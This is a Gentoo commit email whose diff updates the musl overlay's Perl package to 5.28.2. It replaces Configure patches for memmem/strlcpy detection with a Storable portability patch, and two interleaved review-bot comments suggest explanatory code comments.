
From: Jory Pratt <anarchy@g.o>
To: gentoo-commits@l.g.o
Subject: [gentoo-commits] proj/musl:master commit in: dev-lang/perl/files/5.28/, dev-lang/perl/
Date: Sat, 20 Apr 2019 23:26:27
Message-Id: 1555718012.258898fc55bacccafb9fd401bd1cff96178aa228.anarchy@gentoo
1 commit: 258898fc55bacccafb9fd401bd1cff96178aa228
2 Author: Jory Pratt <anarchy <AT> gentoo <DOT> org>
3 AuthorDate: Fri Apr 19 23:53:32 2019 +0000
4 Commit: Jory Pratt <anarchy <AT> gentoo <DOT> org>
5 CommitDate: Fri Apr 19 23:53:32 2019 +0000
6 URL: https://gitweb.gentoo.org/proj/musl.git/commit/?id=258898fc
7
8 dev-lang/perl: bump to 5.28.2 with portability fixes
9
10 Package-Manager: Portage-2.3.64, Repoman-2.3.12
11 Signed-off-by: Jory Pratt <anarchy <AT> gentoo.org>
12
13 dev-lang/perl/Manifest | 4 +-
14 dev-lang/perl/files/5.28/perl-5.28.1-part1.patch | 75 --
15 dev-lang/perl/files/5.28/perl-5.28.1-part2.patch | 27 -
16 dev-lang/perl/files/5.28/perl-5.28.1-part3.patch | 88 --
17 dev-lang/perl/files/5.28/perl-5.28.1-part4.patch | 103 ---
18 dev-lang/perl/files/5.28/perl-5.28.1-part5.patch | 35 -
19 .../perl/files/5.28/perl-5.28.2-portability.patch | 976 +++++++++++++++++++++
20 .../{perl-5.28.1.ebuild => perl-5.28.2.ebuild} | 23 +-
21 8 files changed, 991 insertions(+), 340 deletions(-)
22
23 diff --git a/dev-lang/perl/Manifest b/dev-lang/perl/Manifest
24 index 2cf2ef2..9c51b06 100644
25 --- a/dev-lang/perl/Manifest
26 +++ b/dev-lang/perl/Manifest
27 @@ -1,6 +1,6 @@
28 DIST perl-5.26.2-patches-1.tar.xz 17100 BLAKE2B 681239e438945285e006ee1d1e2a9eb888fc9b425e6fbd4822e65e1fe1ced2216de76485b9792d3fee28783a588c09e1d34c294ef43d81055c4566af37fe9b6c SHA512 2a274150d2dba406c6efb67ec236f67032a51ff1788b30ea556e74b2f02fab68f5029ebd4b9d4daeb16b3a63fa7aa1744d323bf637a9d21946f19f33b69da245
29 DIST perl-5.26.3.tar.xz 11957032 BLAKE2B 3cd5332a0bede16608b1626b0b9903d71105784411c7acf2fd8c0e7637a2ab5049e650bdaba574584ed51a70cc21dfbee5557963717d52c4af9c8bd8e8ef80a1 SHA512 1126ead4f9cc313548e875b6dc9cd1f56f6fef4406f3fd1c108c5cad0db92c8cd0f9bde5b82d78d8f2bd67709c438e87dd45f26b98f327ba31b05b39acc3b299
30 -DIST perl-5.28.0-patches-1.tar.xz 17128 BLAKE2B f16843d9ecf27fa7d42dd59e1591d618ba9ad6b14f4e56bab4019af043eb79559cc7dbc4a1b1e580c18b7ba0b5d71c4da3e3f94955889629a655e7028492a066 SHA512 e05a492ba045ac71d20393099815bed8e4f491bed79a352e83537561eb256d4f672e0125c5cca9e45150c01d3ad463a070a49e845b3c17806d9f77a872d0352a
31 -DIST perl-5.28.1.tar.xz 12372080 BLAKE2B cb487edae4707277995ba098e281efe00a38d671db5e5b08161b202c0fe3136a3e92f04ca3a810bbd5fca9fe5b950376716bcbdd5417bd4042a0ef6c6eef57df SHA512 6d18e9684c3a15bea2ccd28f116d1829c3acd5547551ee3539f0060c0d1a75246dfe570dfb9d5f00625a994a0afb0cbd6a5a5f9a407fef75a421e7dbc6491b43
32 +DIST perl-5.28.2-patches-2.tar.xz 17332 BLAKE2B 74977d4b08e891225a3e0408473df048f6999a1a5044cb68dd205c3a95d5dcceafdaf59c277fd0a0853d5e818c2011434a88aee095cdfcb8ddc393e3a95f93c2 SHA512 b095f7966b8f09f64a6d7e425de91457ecdfddf7d2e73c5ab93632babcd37d0ab74175139484ed019aac09bc4c17ddce38eb75cebc3a80e4d47bbf7b15624c18
33 +DIST perl-5.28.2.tar.xz 12374448 BLAKE2B 82a49fcf3c29ff7241fae7ffaa1bf9f99d8cbfa6d00d5fd9ff7c3c23a461287322e12acba318c8de8507092e33b05549142bc5194bdb4b516994c9cdc0cb3f92 SHA512 0f2e4f7cb5d8cf6e00054b3842907e29b6c85902d97fb881d5bea65edbc875fef4e15e064561fac7c8db4939586576dd76a225026c7cca9624261c887b1fdb08
34 DIST perl-cross-1.1.9.tar.gz 102939 BLAKE2B 438ea75a14c4d60fdf3cb2f3671c736d229a83af210ba4fe6e79b989c6c4b45500d0221ec65bc71e1d43d234ec1daa20b3a19be6ceb01e638810900dbe3664a7 SHA512 002441012bd31f1ea71341707d91f89b76266c187c9d28f947ed5eddbcc6e3155e8dfd4b1814331561c3557764fea25bf6a938f08bcd4adfb5895361ad5a269a
35 DIST perl-cross-1.2.2.tar.gz 106073 BLAKE2B c4eaf5d60dd0ac88a9653cea399f5583a699d35f94a69a36ef9d3cde0017901ff68029f12a3af6e0fd34d46accbb6be009167fadb790da8065f6b85115f1c9b8 SHA512 49dc190018b891daac68a954e2a9bab6294920f02b585c530dcc47af03e8ab51d402455202d45121fa206ee743986ddd50323658c179d2c15cb6af7a2eb0958c
36
37 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part1.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part1.patch
38 deleted file mode 100644
39 index 5ac0e85..0000000
40 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part1.patch
41 +++ /dev/null
42 @@ -1,75 +0,0 @@
43 -From ca152fd8207cf53816b1407d5f54f6ea160a3ef8 Mon Sep 17 00:00:00 2001
44 -From: Andy Dougherty <doughera@×××××××××.edu>
45 -Date: Tue, 22 Jan 2019 14:17:05 -0500
46 -Subject: [PATCH] Improve Configure detection of memmem() [perl #133760].
47 -
48 -Linux systems have memmem, but the header prototype is only visible if
49 -the C library, but didn't check if the correct prototype is available.
50 -This patch compiles & runs a test program that will fail if the prototype
51 -is needed but not available.
52 -
53 -This does not completely close [perl #133760]. The tests for strlcat()
54 -and strlcpy() may also need to be similarly changed. Also, this patch
55 -does not change whether _GNU_SOURCE is defined or not. Presumably that
56 -would be done separately in the linux hints file.
57 ----
58 - Configure | 43 +++++++++++++++++++++++++++++++++++++++++--
59 - 1 file changed, 41 insertions(+), 2 deletions(-)
60 -
61 -diff --git a/Configure b/Configure
62 -index 6041b0bbb0..a83cbdf2f8 100755
63 ---- a/Configure
64 -+++ b/Configure
65 -@@ -16155,8 +16155,47 @@ set mbtowc d_mbtowc
66 - eval $inlibc
67 -
68 - : see if memmem exists
69 --set memmem d_memmem
70 --eval $inlibc
71 -+echo " "
72 -+echo "Checking if you have a working memmem()" >&4
73 -+$cat >try.c <<EOCP
74 -+#$d_gnulibc HAS_GNULIBC /**/
75 -+#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)
76 -+# define _GNU_SOURCE
77 -+#endif
78 -+#include <stdio.h>
79 -+#include <stdlib.h>
80 -+#include <stddef.h>
81 -+#include <string.h>
82 -+int main(int argc, char **argv)
83 -+{
84 -+ char *big = "abcdefghiabcdefghi";
85 -+ char *little = "def";
86 -+ char *rtn;
87 -+ ptrdiff_t diff;
88 -+ rtn = (char *) memmem(big, strlen(big), little, strlen(little));
89 -+ diff = rtn - big;
90 -+ exit(diff == 3 ? EXIT_SUCCESS : EXIT_FAILURE);
91 -+}
92 -+EOCP
93 -+set try
94 -+if eval $compile; then
95 -+ `$run ./try`
96 -+ rc=$?
97 -+ case "$rc" in
98 -+ 0) echo "Yes, you do." >&4
99 -+ val="$define"
100 -+ ;;
101 -+ *) echo "Well, you have memmem, but it isn't working." >&4
102 -+ val="$undef"
103 -+ ;;
104 -+ esac
105 -+else
106 -+ echo "No, you do not." >&4
107 -+ val="$undef"
108 -+fi
109 -+set d_memmem
110 -+eval $setvar
111 -+$rm_try
112 -
113 - : see if memrchr exists
114 - set memrchr d_memrchr
115 ---
116 -2.15.1-424-g9478a660812
117 -
118
119 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part2.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part2.patch
120 deleted file mode 100644
121 index c2c49b6..0000000
122 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part2.patch
123 +++ /dev/null
124 @@ -1,27 +0,0 @@
125 -From 63c1fa6a98bc60234a21de83dd191cd581a5d073 Mon Sep 17 00:00:00 2001
126 -From: Andy Dougherty <doughera@×××××××××.edu>
127 -Date: Wed, 23 Jan 2019 21:12:29 -0500
128 -Subject: [PATCH] Add ability to include literal text in the prototype check.
129 -
130 -This is the same technique as in the metaconfig unit Protochk.U.
131 -See that unit for more usage information. It is a bit clunky,
132 -but does work.
133 ----
134 - Configure | 1 +
135 - 1 file changed, 1 insertion(+)
136 -
137 -diff --git a/Configure b/Configure
138 -index a83cbdf2f8..179545727e 100755
139 ---- a/Configure
140 -+++ b/Configure
141 -@@ -10739,6 +10739,7 @@ hasproto='varname=$1; func=$2; shift; shift;
142 - while $test $# -ge 2; do
143 - case "$1" in
144 - $define) echo "#include <$2>";;
145 -+ literal) echo "$2" ;;
146 - esac ;
147 - shift 2;
148 - done > try.c;
149 ---
150 -2.15.1-424-g9478a660812
151 -
152
153 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part3.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part3.patch
154 deleted file mode 100644
155 index 3e31c1d..0000000
156 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part3.patch
157 +++ /dev/null
158 @@ -1,88 +0,0 @@
159 -From f8d82a1010426d0eb49c33cb903413b882c85c3e Mon Sep 17 00:00:00 2001
160 -From: Andy Dougherty <doughera@×××××××××.edu>
161 -Date: Wed, 23 Jan 2019 21:39:39 -0500
162 -Subject: [PATCH] Another attempt to improve Configure detection of memmem()
163 - [perl #133760].
164 -
165 -This updates commit ca152fd8207cf53816b1407d5f54f6ea160a3ef8.
166 -Linux systems have memmem, but the prototype in <string.h> is only
167 -visible if __GNU_SOURCE is defined. This version tests for both the
168 -prototype in <string.h> and the symbol in libc. (Thanks to Tony C. for
169 -the suggestion.) (For BSD systems, no extra define is needed.)
170 ----
171 - Configure | 58 ++++++++++++++++++----------------------------------------
172 - 1 file changed, 18 insertions(+), 40 deletions(-)
173 -
174 -diff --git a/Configure b/Configure
175 -index 179545727e..ad17948a2c 100755
176 ---- a/Configure
177 -+++ b/Configure
178 -@@ -16156,47 +16156,25 @@ set mbtowc d_mbtowc
179 - eval $inlibc
180 -
181 - : see if memmem exists
182 -+: We need both a prototype in string.h and the symbol in libc.
183 - echo " "
184 --echo "Checking if you have a working memmem()" >&4
185 --$cat >try.c <<EOCP
186 --#$d_gnulibc HAS_GNULIBC /**/
187 --#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)
188 --# define _GNU_SOURCE
189 --#endif
190 --#include <stdio.h>
191 --#include <stdlib.h>
192 --#include <stddef.h>
193 --#include <string.h>
194 --int main(int argc, char **argv)
195 --{
196 -- char *big = "abcdefghiabcdefghi";
197 -- char *little = "def";
198 -- char *rtn;
199 -- ptrdiff_t diff;
200 -- rtn = (char *) memmem(big, strlen(big), little, strlen(little));
201 -- diff = rtn - big;
202 -- exit(diff == 3 ? EXIT_SUCCESS : EXIT_FAILURE);
203 --}
204 --EOCP
205 --set try
206 --if eval $compile; then
207 -- `$run ./try`
208 -- rc=$?
209 -- case "$rc" in
210 -- 0) echo "Yes, you do." >&4
211 -- val="$define"
212 -- ;;
213 -- *) echo "Well, you have memmem, but it isn't working." >&4
214 -- val="$undef"
215 -- ;;
216 -- esac
217 --else
218 -- echo "No, you do not." >&4
219 -- val="$undef"
220 --fi
221 --set d_memmem
222 --eval $setvar
223 --$rm_try
224 -+d_memmem_proto=''
225 -+xx1="#$d_gnulibc HAS_GNULIBC"
226 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
227 -+xx3='# define _GNU_SOURCE'
228 -+xx4='#endif'
229 -+set d_memmem_proto memmem literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
230 -+eval $hasproto
231 -+case "$d_memmem_proto" in
232 -+ define) # see if memmem exists
233 -+ set memmem d_memmem
234 -+ eval $inlibc
235 -+ ;;
236 -+ *) val=$undef
237 -+ set d_memmem
238 -+ eval $setvar
239 -+ ;;
240 -+esac
241 -
242 - : see if memrchr exists
243 - set memrchr d_memrchr
244 ---
245 -2.15.1-424-g9478a660812
246 -
247
248 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part4.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part4.patch
249 deleted file mode 100644
250 index 17f62ab..0000000
251 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part4.patch
252 +++ /dev/null
253 @@ -1,103 +0,0 @@
254 -From ba73a4cb8f472480a2d630613d1e9e1172d518d3 Mon Sep 17 00:00:00 2001
255 -From: Andy Dougherty <doughera@×××××××××.edu>
256 -Date: Thu, 31 Jan 2019 13:04:32 -0500
257 -Subject: [PATCH] Improve detection of memrchr, strlcat, and strlcpy.
258 -
259 -This is continuation of commit f8d82a1010 addressing [perl #133760].
260 -Linux systems using the musl C library have memmem, memrchr, strlcat, and
261 -strlcpy, but the prototypes are only visible if _GNU_SOURCE is defined.
262 -This patch makes Configure test both whether the prototype is visible
263 -and whether the C symbol is visible.
264 -
265 -Still to be done is automatically adding _GNU_SOURCE if the musl library
266 -is being used -- probably in hints/linux.sh.
267 ----
268 - Configure | 63 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++------
269 - 1 file changed, 57 insertions(+), 6 deletions(-)
270 -
271 -diff --git a/Configure b/Configure
272 -index ad17948a2c..b91d1565b1 100755
273 ---- a/Configure
274 -+++ b/Configure
275 -@@ -16177,8 +16177,25 @@ case "$d_memmem_proto" in
276 - esac
277 -
278 - : see if memrchr exists
279 --set memrchr d_memrchr
280 --eval $inlibc
281 -+: We need both a prototype in string.h and the symbol in libc.
282 -+echo " "
283 -+d_memrchr_proto=''
284 -+xx1="#$d_gnulibc HAS_GNULIBC"
285 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
286 -+xx3='# define _GNU_SOURCE'
287 -+xx4='#endif'
288 -+set d_memrchr_proto memrchr literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
289 -+eval $hasproto
290 -+case "$d_memrchr_proto" in
291 -+ define) # see if memrchr exists
292 -+ set memrchr d_memrchr
293 -+ eval $inlibc
294 -+ ;;
295 -+ *) val=$undef
296 -+ set d_memrchr
297 -+ eval $setvar
298 -+ ;;
299 -+esac
300 -
301 - : see if mkdir exists
302 - set mkdir d_mkdir
303 -@@ -18787,12 +18804,46 @@ set strftime d_strftime
304 - eval $inlibc
305 -
306 - : see if strlcat exists
307 --set strlcat d_strlcat
308 --eval $inlibc
309 -+: We need both a prototype in string.h and the symbol in libc.
310 -+echo " "
311 -+d_strlcat_proto=''
312 -+xx1="#$d_gnulibc HAS_GNULIBC"
313 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
314 -+xx3='# define _GNU_SOURCE'
315 -+xx4='#endif'
316 -+set d_strlcat_proto strlcat literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
317 -+eval $hasproto
318 -+case "$d_strlcat_proto" in
319 -+ define) # see if strlcat exists
320 -+ set strlcat d_strlcat
321 -+ eval $inlibc
322 -+ ;;
323 -+ *) val=$undef
324 -+ set d_strlcat
325 -+ eval $setvar
326 -+ ;;
327 -+esac
328 -
329 - : see if strlcpy exists
330 --set strlcpy d_strlcpy
331 --eval $inlibc
332 -+: We need both a prototype in string.h and the symbol in libc.
333 -+echo " "
334 -+d_strlcpy_proto=''
335 -+xx1="#$d_gnulibc HAS_GNULIBC"
336 -+xx2='#if defined(HAS_GNULIBC) && !defined(_GNU_SOURCE)'
337 -+xx3='# define _GNU_SOURCE'
338 -+xx4='#endif'
339 -+set d_strlcpy_proto strlcpy literal "$xx1" literal "$xx2" literal "$xx3" literal "$xx4" define string.h
340 -+eval $hasproto
341 -+case "$d_strlcpy_proto" in
342 -+ define) # see if strlcpy exists
343 -+ set strlcpy d_strlcpy
344 -+ eval $inlibc
345 -+ ;;
346 -+ *) val=$undef
347 -+ set d_strlcpy
348 -+ eval $setvar
349 -+ ;;
350 -+esac
351 -
352 - : see if strnlen exists
353 - set strnlen d_strnlen
354 ---
355 -2.15.1-424-g9478a660812
356 -
357
358 diff --git a/dev-lang/perl/files/5.28/perl-5.28.1-part5.patch b/dev-lang/perl/files/5.28/perl-5.28.1-part5.patch
359 deleted file mode 100644
360 index e9cac65..0000000
361 --- a/dev-lang/perl/files/5.28/perl-5.28.1-part5.patch
362 +++ /dev/null
363 @@ -1,35 +0,0 @@
364 -From 04db542212fdad3a62f13afe741c99028f4bf799 Mon Sep 17 00:00:00 2001
365 -From: Andy Dougherty <doughera@×××××××××.edu>
366 -Date: Thu, 31 Jan 2019 14:05:41 -0500
367 -Subject: [PATCH] Define _GNU_SOURCE if using the musl libc on linux.
368 -
369 -Together with prior commits ba73a4cb8f, f8d82a1010, and 63c1fa6a98,
370 -this should close [perl #133760].
371 ----
372 - hints/linux.sh | 10 ++++++++++
373 - 1 file changed, 10 insertions(+)
374 -
375 -diff --git a/hints/linux.sh b/hints/linux.sh
376 -index 3f38ea07f1..a985a8ee1b 100644
377 ---- a/hints/linux.sh
378 -+++ b/hints/linux.sh
379 -@@ -178,6 +178,16 @@ case "$plibpth" in
380 - ;;
381 - esac
382 -
383 -+# For the musl libc, perl should #define _GNU_SOURCE. Otherwise, some
384 -+# available functions, like memem, won't be used. See the discussion in
385 -+# [perl #133760]. musl doesn't offer an easy way to identify it, but,
386 -+# at least on alpine linux, the ldd --version output contains the
387 -+# string 'musl.'
388 -+case `ldd --version 2>&1` in
389 -+ musl*) ccflags="$ccflags -D_GNU_SOURCE" ;;
390 -+ *) ;;
391 -+esac
392 -+
393 - # libquadmath is sometimes installed as gcc internal library,
394 - # so contrary to our usual policy of *not* looking at gcc internal
395 - # directories we now *do* look at them, in case they contain
396 ---
397 -2.15.1-424-g9478a660812
398 -
399
400 diff --git a/dev-lang/perl/files/5.28/perl-5.28.2-portability.patch b/dev-lang/perl/files/5.28/perl-5.28.2-portability.patch
401 new file mode 100644
402 index 0000000..38d4027
403 --- /dev/null
404 +++ b/dev-lang/perl/files/5.28/perl-5.28.2-portability.patch
405 @@ -0,0 +1,976 @@
406 +From 841cea7b099fc12274991dda349a86b1ce8059da Mon Sep 17 00:00:00 2001
407 +From: Andreas K. Hüttel <dilfridge@g.o>
408 +Date: Fri, 19 Apr 2019 21:16:33 +0000
409 +Subject: [PATCH] Fix Storable for non glibc systems
410 +
411 +---
412 + MANIFEST | 1 -
413 + Makefile.SH | 25 ---
414 + Porting/Maintainers.pl | 4 +-
415 + dist/Storable/ChangeLog | 30 ++++
416 + dist/Storable/Makefile.PL | 46 +-----
417 + dist/Storable/__Storable__.pm | 35 ++--
418 + dist/Storable/stacksize | 77 ++-------
419 + dist/Storable/t/CVE-2015-1592.inc | 261 ------------------------------
420 + dist/Storable/t/CVE-2015-1592.t | 25 ++-
421 + dist/Storable/t/dclone.t | 2 +
422 + dist/Storable/t/recurse.t | 4 +-
423 + dist/Storable/t/threads.t | 4 +
424 + mkppport.lst | 1 +
425 + win32/GNUmakefile | 12 +-
426 + win32/Makefile | 10 +-
427 + win32/makefile.mk | 15 +-
428 + 16 files changed, 103 insertions(+), 449 deletions(-)
429 + delete mode 100644 dist/Storable/t/CVE-2015-1592.inc
430 +
431 +diff --git a/MANIFEST b/MANIFEST
432 +index a6b5fe5..0f07fec 100644
433 +--- a/MANIFEST
434 ++++ b/MANIFEST
435 +@@ -3716,7 +3716,6 @@ dist/Storable/t/code.t See if Storable works
436 + dist/Storable/t/compat01.t See if Storable works
437 + dist/Storable/t/compat06.t See if Storable works
438 + dist/Storable/t/croak.t See if Storable works
439 +-dist/Storable/t/CVE-2015-1592.inc See if Storable works
440 + dist/Storable/t/CVE-2015-1592.t See if Storable works
441 + dist/Storable/t/dclone.t See if Storable works
442 + dist/Storable/t/destroy.t Test Storable in global destructon
443 +diff --git a/Makefile.SH b/Makefile.SH
444 +index 61970d4..7440fc2 100755
445 +--- a/Makefile.SH
446 ++++ b/Makefile.SH
447 +@@ -189,15 +189,11 @@ esac
448 +
449 + : is Cwd static or dynamic
450 + static_cwd='define'
451 +-storable_limit_dep=''
452 +-storable_type=''
453 + list_util_dep='$(PERL_EXE)'
454 + for f in $dynamic_ext; do
455 + case $f in
456 + Cwd) static_cwd='undef' ;;
457 + List/Util) list_util_dep=lib/auto/List/Util/Util.$dlext ;;
458 +- Storable) storable_limit_dep=lib/auto/Storable/Storable.$dlext
459 +- storable_type='dynamic' ;;
460 + esac
461 + done
462 +
463 +@@ -234,7 +230,6 @@ for f in $static_ext; do
464 + $this_target: lib/auto/List/Util/Util\$(LIB_EXT)" ;;
465 + Unicode/Normalize) extra_dep="$extra_dep
466 + $this_target: uni.data" ;;
467 +- Storable) storable_type='static' ;;
468 + esac
469 + done
470 +
471 +@@ -1201,26 +1196,6 @@ no_install no-install: install-notify
472 + install: install-all
473 + !NO!SUBS!
474 +
475 +-if test "$storable_type" != "" ; then
476 +-
477 +-case "$static_cwd" in
478 +-undef) storable_limit_dep="$storable_limit_dep lib/auto/Cwd/Cwd.$dlext" ;;
479 +-esac
480 +-
481 +-$spitshell >>$Makefile <<EOT
482 +-
483 +-dist/Storable/lib/Storable/Limit.pm : \$(PERL_EXE) dist/Storable/stacksize $storable_limit_dep
484 +- cd dist/Storable ; \$(LDLIBPTH) \$(MAKE) lib/Storable/Limit.pm
485 +-
486 +-lib/Storable/Limit.pm : dist/Storable/lib/Storable/Limit.pm
487 +- test -d lib/Storable || mkdir lib/Storable
488 +- cp dist/Storable/lib/Storable/Limit.pm lib/Storable/Limit.pm
489 +-EOT
490 +-
491 +-common_build_deps="$common_build_deps lib/Storable/Limit.pm"
492 +-
493 +-fi
494 +-
495 + for name in all notify silent strip verbose; do
496 + flags="--$name";
497 + flags=`echo $flags | sed -e 's/--all//'`
498 +diff --git a/Porting/Maintainers.pl b/Porting/Maintainers.pl
499 +index 4f039f7..64b56a5 100755
500 +--- a/Porting/Maintainers.pl
501 ++++ b/Porting/Maintainers.pl
502 +@@ -351,7 +351,7 @@ use File::Glob qw(:case);
503 + 'EXCLUDED' => [
504 + 'PPPort.pm', # we use PPPort_pm.PL instead
505 + ],
506 +- 'CUSTOMIZED' => [ qw[ parts/embed.fnc ] ],
507 ++ 'CUSTOMIZED' => [ qw[ parts/embed.fnc ] ],
508 + },
509 +
510 + 'Devel::SelfStubber' => {
511 +@@ -1010,7 +1010,7 @@ use File::Glob qw(:case);
512 + },
513 +
514 + 'Storable' => {
515 +- 'DISTRIBUTION' => 'AMS/Storable-2.51.tar.gz',
516 ++ 'DISTRIBUTION' => 'XSAWYERX/Storable-3.11.tar.gz',
517 + 'FILES' => q[dist/Storable],
518 + 'EXCLUDED' => [
519 + qr{^t/compat/},
520 +diff --git a/dist/Storable/ChangeLog b/dist/Storable/ChangeLog
521 +index 3f3076a..5e63ea6 100644
522 +--- a/dist/Storable/ChangeLog
523 ++++ b/dist/Storable/ChangeLog
524 +@@ -1,3 +1,33 @@
525 ++unreleased
526 ++ version 3.14
527 ++ * (perl #133708) don't build-time probe for stack limits at all
528 ++
529 ++unreleased
530 ++ version 3.12
531 ++ * (perl #133411) don't probe for stack limits with -Dusecrosscompile
532 ++
533 ++2018-04-27 20:40:00 xsawyerx
534 ++ version 3.11
535 ++ * Fix Strawberry Perl build failures.
536 ++
537 ++2018-04-21 22:00:00 xsawyerx
538 ++ Version 3.10
539 ++ * Fix binary artifacts from distribution.
540 ++
541 ++2018-04-21 16:49:00 xsawyerx
542 ++ Version 3.09
543 ++ * Fix "provides" in metadata (META.yml/META.json) to use the Storable
544 ++ template instead of a small other file (which also didn't exist).
545 ++
546 ++2018-04-21 11:23:00 xsawyerx
547 ++ Version 3.08
548 ++ * (perl #132849) try to disable core files when deliberatly segfaulting.
549 ++ * (perl #127743) don't probe Storable limits so much.
550 ++ * (perl #132893) don't probe for Storable recursion limits on old Win32.
551 ++ * (perl #132870) workaround VC2017 compiler bug.
552 ++ * (perl #127743) re-work for debugging builds with MSVC.
553 ++ * (perl #133039) dont build a Storable.so/.dll with a static perl build.
554 ++
555 + 2018-02-07 15:08:00 tonyc
556 + Version 3.06
557 +
558 +diff --git a/dist/Storable/Makefile.PL b/dist/Storable/Makefile.PL
559 +index 092bab4..4a39125 100644
560 +--- a/dist/Storable/Makefile.PL
561 ++++ b/dist/Storable/Makefile.PL
562 +@@ -7,21 +7,18 @@
563 + #
564 +
565 + use strict;
566 +-use ExtUtils::MakeMaker;
567 ++use warnings;
568 ++use ExtUtils::MakeMaker 6.31;
569 + use Config;
570 + use File::Copy qw(move copy);
571 + use File::Spec;
572 +
573 +-unlink "lib/Storable/Limit.pm";
574 +-
575 + my $pm = { 'Storable.pm' => '$(INST_ARCHLIB)/Storable.pm' };
576 +-unless ($ENV{PERL_CORE}) {
577 +- # the core Makefile takes care of this for core builds
578 +- $pm->{"lib/Storable/Limit.pm"} = '$(INST_ARCHLIB)/Storable/Limit.pm';
579 +-}
580 +
581 + WriteMakefile(
582 + NAME => 'Storable',
583 ++ AUTHOR => 'Perl 5 Porters',
584 ++ LICENSE => 'perl',
585 + DISTNAME => "Storable",
586 + # We now ship this in t/
587 + # PREREQ_PM => { 'Test::More' => '0.41' },
588 +@@ -36,7 +33,7 @@ WriteMakefile(
589 + { bugtracker => 'http://rt.perl.org/perlbug/' },
590 + provides => {
591 + 'Storable' => {
592 +- file => 'Storable_pm.PL',
593 ++ file => '__Storable__.pm',
594 + version => MM->parse_version('__Storable__.pm'),
595 + },
596 + },
597 +@@ -81,28 +78,7 @@ sub xlinkext {
598 + }
599 +
600 + sub depend {
601 +- my $extra_deps = "";
602 +- my $options = "";
603 +- if ($ENV{PERL_CORE}) {
604 +- $options = "--core";
605 +- }
606 +- else {
607 +- # blib.pm needs arch/lib
608 +- $extra_deps = ' Storable.pm';
609 +- }
610 +- my $whichperl;
611 +- if ($Config::Config{usecrosscompile}) {
612 +- $whichperl = '$(PERLRUN)';
613 +- }
614 +- else {
615 +- $whichperl = '$(FULLPERLRUNINST)';
616 +- }
617 +- my $linktype = uc($_[0]->{LINKTYPE});
618 +- my $limit_pm = File::Spec->catfile('lib', 'Storable', 'Limit.pm');
619 + "
620 +-$limit_pm : stacksize \$(INST_$linktype)$extra_deps
621 +- \$(MKPATH) \$(INST_LIB)
622 +- $whichperl stacksize $options
623 +
624 + release : dist
625 + git tag \$(VERSION)
626 +@@ -112,18 +88,6 @@ release : dist
627 + "
628 + }
629 +
630 +-sub test {
631 +- my ($self, %attr) = @_;
632 +-
633 +- my $out = $self->SUPER::test(%attr);
634 +-
635 +- if ($ENV{PERL_CORE}) {
636 +- $out =~ s!^(test(?:db)?_(?:static|dynamic)\b.*)!$1 lib/Storable/Limit.pm!gm;
637 +- }
638 +-
639 +- $out;
640 +-}
641 +-
642 + sub postamble {
643 + '
644 + all :: Storable.pm
645 +diff --git a/dist/Storable/__Storable__.pm b/dist/Storable/__Storable__.pm
646 +index e77b240..812675a 100644
647 +--- a/dist/Storable/__Storable__.pm
648 ++++ b/dist/Storable/__Storable__.pm
649 +@@ -27,18 +27,18 @@ our @EXPORT_OK = qw(
650 +
651 + our ($canonical, $forgive_me);
652 +
653 +-our $VERSION = '3.08_01';
654 ++our $VERSION = '3.14';
655 +
656 + our $recursion_limit;
657 + our $recursion_limit_hash;
658 +
659 +-do "Storable/Limit.pm";
660 +-
661 + $recursion_limit = 512
662 + unless defined $recursion_limit;
663 + $recursion_limit_hash = 256
664 + unless defined $recursion_limit_hash;
665 +
666 ++use Carp;
667 ++
668 + BEGIN {
669 + if (eval {
670 + local $SIG{__DIE__};
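Review bot: With `do "Storable/Limit.pm";` removed, the literals in `$recursion_limit = 512` and `$recursion_limit_hash = 256` become the effective depth guards whenever the caller has not set them, yet the assignments carry no comment saying so. A short comment above them would help, for example `# Fixed recursion-depth defaults; no longer probed at build time (perl #133708). Callers may set either variable beforehand to change the guard.` The POD changed later in this patch notes that build-time and run-time stack sizes can differ, so these values may be too generous on a target with a small stack; saying that at the assignment tells packagers where to tune. The `BEGIN` block that follows continues outside this hunk.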
671 +@@ -54,16 +54,23 @@ BEGIN {
672 + # provide a fallback implementation.
673 + #
674 + unless ($Storable::{logcroak} && *{$Storable::{logcroak}}{CODE}) {
675 +- require Carp;
676 ++ *logcroak = \&Carp::croak;
677 ++ }
678 ++ else {
679 ++ # Log::Agent's logcroak always adds a newline to the error it is
680 ++ # given. This breaks refs getting thrown. We can just discard what
681 ++ # it throws (but keep whatever logging it does) and throw the original
682 ++ # args.
683 ++ no warnings 'redefine';
684 ++ my $logcroak = \&logcroak;
685 + *logcroak = sub {
686 +- Carp::croak(@_);
687 ++ my @args = @_;
688 ++ eval { &$logcroak };
689 ++ Carp::croak(@args);
690 + };
691 + }
692 + unless ($Storable::{logcarp} && *{$Storable::{logcarp}}{CODE}) {
693 +- require Carp;
694 +- *logcarp = sub {
695 +- Carp::carp(@_);
696 +- };
697 ++ *logcarp = \&Carp::carp;
698 + }
699 + }
700 +
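Review bot: The bare `eval { &$logcroak };` in the new wrapper depends on two things that a later cleanup could easily undo, and neither is spelled out. The first is that `&$logcroak` without parentheses forwards the current `@_`, and the second is that the exception from Log::Agent's `logcroak` is deliberately thrown away so that `Carp::croak(@args)` can rethrow the original, possibly reference, arguments. The existing comment covers the second point; I would add `# bare &$code call: forwards our @_ to the original logcroak on purpose` on the `eval` line. Writing it as `eval { $logcroak->(@args) };` would be the same call without the sigil form that linters flag.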
